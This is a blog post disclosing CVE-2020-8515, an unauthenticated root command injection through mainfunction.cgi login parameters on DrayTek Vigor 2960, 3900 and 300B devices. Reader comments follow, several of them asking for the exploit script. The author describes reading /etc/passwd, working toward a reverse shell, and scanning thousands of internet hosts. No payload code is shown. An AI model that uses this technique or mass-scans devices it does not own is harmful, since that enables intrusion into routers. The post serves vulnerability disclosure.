Sunday, January 26, 2020

[DrayTek] - Unauthenticated RCE in Draytek Vigor 2960, 3900 and 300B (CVE-2020-8515)

DrayTek is a manufacturer of Firewalls, VPN Devices , Routers, WLAN devices, etc, based in China.Investigating on different network devices I found that there's a device model named Vigor 2960 (no, it's not a switch as the Cisco one). The Draytek Vigor 2960 is a High-Performance Dual-Wan Load Balancing Router & VPN Gateway.

When you try to authenticate, this device sends a POST request to mainfunction.cgi with different parameters.

Now, what if we try adding in every parameter any escape character?, after a few tries , trying to execute the pwd command, it was possible. 

After executing the command, I was thinking on how to escalate privileges, but this was a surprise. After running the command id, i though that the answer was going to be "www-data" or something related, but it was root!.

Here are more example of differents commands executed.
ups! /etc/passwd ;) 

Right now Im working on the reverse shell thing, because the commands executed are being parsed by the mainfunction.cgi. Is a little bit tricky to get a reverse shell with a command without spaces. Sed is replacing the spaces with "+".

But I'm concern of something more important than that. If you go to right now, and search for "Draytek" only, you'll find 710,029 hosts!.

If you search for the Vigor 2960 model, you'll have 15,429 host.

All of this host are vulnerable?. Let's find out.

After a few hours I created a python script to check if a list of IPs is vulnerable to this RCE. So, after exporting all the results for Vigor 2960, and a few hours later, all the hosts were tested.


3593 are vulnerable!, and I'm 100% sure that the vulnerable hosts are more, because of the timeout parameter configured in the requests.
And that's not all! 

This vulnerability is fully compatible also for the DrayTek Vigor 3900 and 300B!.

Draytek Vigor 3900

Draytek 300B

This device is not a VPN device as the others, this is a Loadbalancer.

Until now, what version/firmware was detected as vulnerable?

  •  Vigor2960
    • 1.3.1_Beta
  • Vigor3900
    • 1.4.4_Beta
  • Vigor300B
  • 1.4.4_Beta
  • 1.3.3_Beta
CVE: CVE-2020-8515

By @mpx0



11 comentarios:

  1. Hi!
    Did you request CVE self or through DrayTek?

  2. hello can you send me script of exploit

  3. whats the payload of exploit can send to me at

  4. can you add more explain about this exploit please.

  5. hello I am from Draytek company. Could you please provide the verification script for the vulnerability? Thank you very much

  6. Do you have script to run I have lots of draytek we manage and would be great to run agains our ips.

  7. I'm from FBI. Gimme the fucking script

  8. How to make this article script available?

  9. Enjoyed reading the article above, really explains everything in detail, the article is very interesting and effective. Thank you and good luck for the upcoming articles Python Programming Training